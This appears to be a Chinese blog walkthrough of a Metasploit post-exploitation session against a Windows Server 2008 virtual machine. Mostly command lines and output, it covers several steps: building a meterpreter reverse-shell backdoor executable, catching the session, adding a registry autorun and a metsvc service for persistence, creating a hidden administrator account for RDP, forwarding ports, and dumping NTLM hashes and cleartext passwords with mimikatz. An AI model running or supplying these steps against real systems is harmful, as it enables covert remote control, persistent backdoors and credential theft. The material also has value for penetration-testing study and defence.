Metasploit backdoor


OS:Windows server 2008 (64位)


root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=2013 X > file.exe Created by msfpayload ( . Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"", "LPORT"=>"2013"}


root@Kali:~# msfconsole msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST => msf exploit(handler) > set LPORT 2013 LPORT => 2013 msf exploit(handler) > exploit [*] Started reverse handler on [*] Starting the payload handler...


[*] Sending stage (769024 bytes) to [*] Meterpreter session 1 opened ( -> at 2014-03-13 22:23:18 +0800 meterpreter >


meterpreter > getuid //查看当前权限 Server username: WIN-K30V5SI0PCEAdministrator meterpreter > ps //列出当前进程 Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32smss.exe 264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe 388 380 csrss.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe 396 328 wininit.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32wininit.exe 432 380 winlogon.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe 492 396 services.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32services.exe 500 396 lsass.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsass.exe 512 396 lsm.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsm.exe 596 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 656 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 748 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 796 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 840 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 856 388 conhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32conhost.exe 860 2044 cmd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32cmd.exe 884 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 924 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 972 492 sppsvc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32sppsvc.exe 976 492 spoolsv.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32spoolsv.exe 1056 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 1092 492 vmtoolsd.exe x86_64 0 NT AUTHORITYSYSTEM C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1332 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 1492 2044 vmtoolsd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1560 492 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32dllhost.exe 1640 492 msdtc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32msdtc.exe 1968 492 taskhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32taskhost.exe 2024 884 dwm.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32dwm.exe 2044 2016 explorer.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowsexplorer.exe 2204 2428 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2312 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 2332 2044 file.exe x86 1 WIN-K30V5SI0PCEAdministrator C:UsersAdministratorDesktopfile.exe 2428 492 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2588 492 mscorsvw.exe x86 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe 2972 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe meterpreter > migrate 2044 //迁移到PID为2044的explorer进程 [*] Migrating from 2332 to 2044... [*] Migration completed successfully. meterpreter >


meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM SystemRootSystem32smss.exe 264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32csrss.exe 388 380 csrss.exe x86_64 1 NT AUTHORITYSYSTEM C:Windowssystem32csrss.exe 396 328 wininit.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32wininit.exe 432 380 winlogon.exe x86_64 1 NT AUTHORITYSYSTEM C:Windowssystem32winlogon.exe 492 396 services.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32services.exe 500 396 lsass.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32lsass.exe 512 396 lsm.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32lsm.exe 596 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 656 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 748 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 796 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 840 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 856 388 conhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32conhost.exe 860 2044 cmd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32cmd.exe 884 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 924 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 972 492 sppsvc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32sppsvc.exe 976 492 spoolsv.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32spoolsv.exe 1056 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 1092 492 vmtoolsd.exe x86_64 0 NT AUTHORITYSYSTEM C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1332 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 1492 2044 vmtoolsd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1560 492 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32dllhost.exe 1640 492 msdtc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32msdtc.exe 1968 492 taskhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32taskhost.exe 2024 884 dwm.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32Dwm.exe 2044 2016 explorer.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsExplorer.EXE 2312 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 2428 492 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2588 492 mscorsvw.exe x86 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe 2972 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe


meterpreter > run post/windows/gather/checkvm [*] Checking if WIN-K30V5SI0PCE is a Virtual Machine ..... [*] This is a VMware Virtual Machine meterpreter >


meterpreter > run persistence -h Meterpreter Script for creating a persistent backdoor on a target host. OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -L Location in target host where to write payload to, if none %TEMP% will be used. -P Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on the remote host where Metasploit is listening -r The IP of the system running Metasploit listening for the connect back meterpreter >


meterpreter > run persistence -X -i 10 -p 2241 -r [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=2241 [*] Persistent agent script is 148439 bytes long [+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [+] Agent executed with PID 2916 [*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ [+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ meterpreter >


msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST => msf exploit(handler) > set LPORT 2241 LPORT => 2241 msf exploit(handler) > exploit [*] Started reverse handler on [*] Starting the payload handler... [*] Sending stage (769024 bytes) to [*] Meterpreter session 1 opened ( -> at 2014-03-13 23:01:55 +0800 meterpreter >


meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:UsersADMINI~1AppDataLocalTempHzWbqqRpuBlxn... [*] >> Uploading metsrv.x86.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter >


root@Kali:~# msfconsole , , / ((__---,,,---__)) (_) O O (_)_________ _ / | o_o M S F | _____ | * ||| WW||| ||| ||| Using notepad to track pentests? Have Metasploit Pro report on hosts, services, sessions and evidence -- type 'go_pro' to launch it now. =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0] + -- --=[ 1239 exploits - 755 auxiliary - 207 post + -- --=[ 324 payloads - 31 encoders - 8 nops msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/metsvc_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set RHOST RHOST => msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... [*] Meterpreter session 1 opened ( -> at 2014-03-13 23:12:54 +0800 meterpreter >


meterpreter > run getgui -u zero -p haizeiwang123_ [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez [email protected] [*] Setting user account for logon [*] Adding User: zero with Password: haizeiwang123_ [*] Hiding user from Windows Login screen [*] Adding User: zero to local group 'Remote Desktop Users' [*] Adding User: zero to local group 'Administrators' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc meterpreter >


meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L The local host to listen on (optional). -h Help banner. -l The local port to listen on. -p The remote port to connect to. -r The remote host to connect to. meterpreter > portfwd add -L 1234 -p 3389 -r [-] You must supply a local port, remote host, and remote port. meterpreter > portfwd add -l 1234 -p 3389 -r [*] Local TCP relay created: <-> meterpreter >


rdesktop -u zero -p haizeiwang123_

由于我的Windows 2008是64位的,所以先要转移到64位进程

meterpreter > ps ...... 2000 472 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32dllhost.exe 2264 1832 explorer.exe x86_64 2 WIN-K30V5SI0PCEzero C:Windowsexplorer.exe 2292 2264 vmtoolsd.exe x86_64 2 WIN-K30V5SI0PCEzero C:Program FilesVMwareVMware Toolsvmtoolsd.exe 2520 372 FfBoPtYGlNj.exe x86 1 WIN-K30V5SI0PCEAdministrator C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe 2780 2256 winlogon.exe x86_64 2 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe 3028 880 dwm.exe x86_64 2 WIN-K30V5SI0PCEzero C:WindowsSystem32dwm.exe meterpreter > migrate 2780 [*] Removing existing TCP relays... [*] Successfully stopped TCP relay on [*] 1 TCP relay(s) removed. [*] Migrating from 1428 to 2264... [*] Migration completed successfully. [*] Recreating TCP relay(s)... [*] Local TCP relay recreated: <-> meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter >


meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;339062 NTLM WIN-K30V5SI0PCE Administrator lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be } 0;593431 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;593459 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;995 Negotiate NT AUTHORITY IUSR n.s. (Credentials KO) 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO) 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;47971 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)


meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ 0;47971 NTLM 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;995 Negotiate NT AUTHORITY IUSR 0;339062 NTLM WIN-K30V5SI0PCE Administrator ceshimima123_ 0;593459 NTLM WIN-K30V5SI0PCE zero haizeiwang123_ 0;593431 NTLM WIN-K30V5SI0PCE zero haizeiwang123_
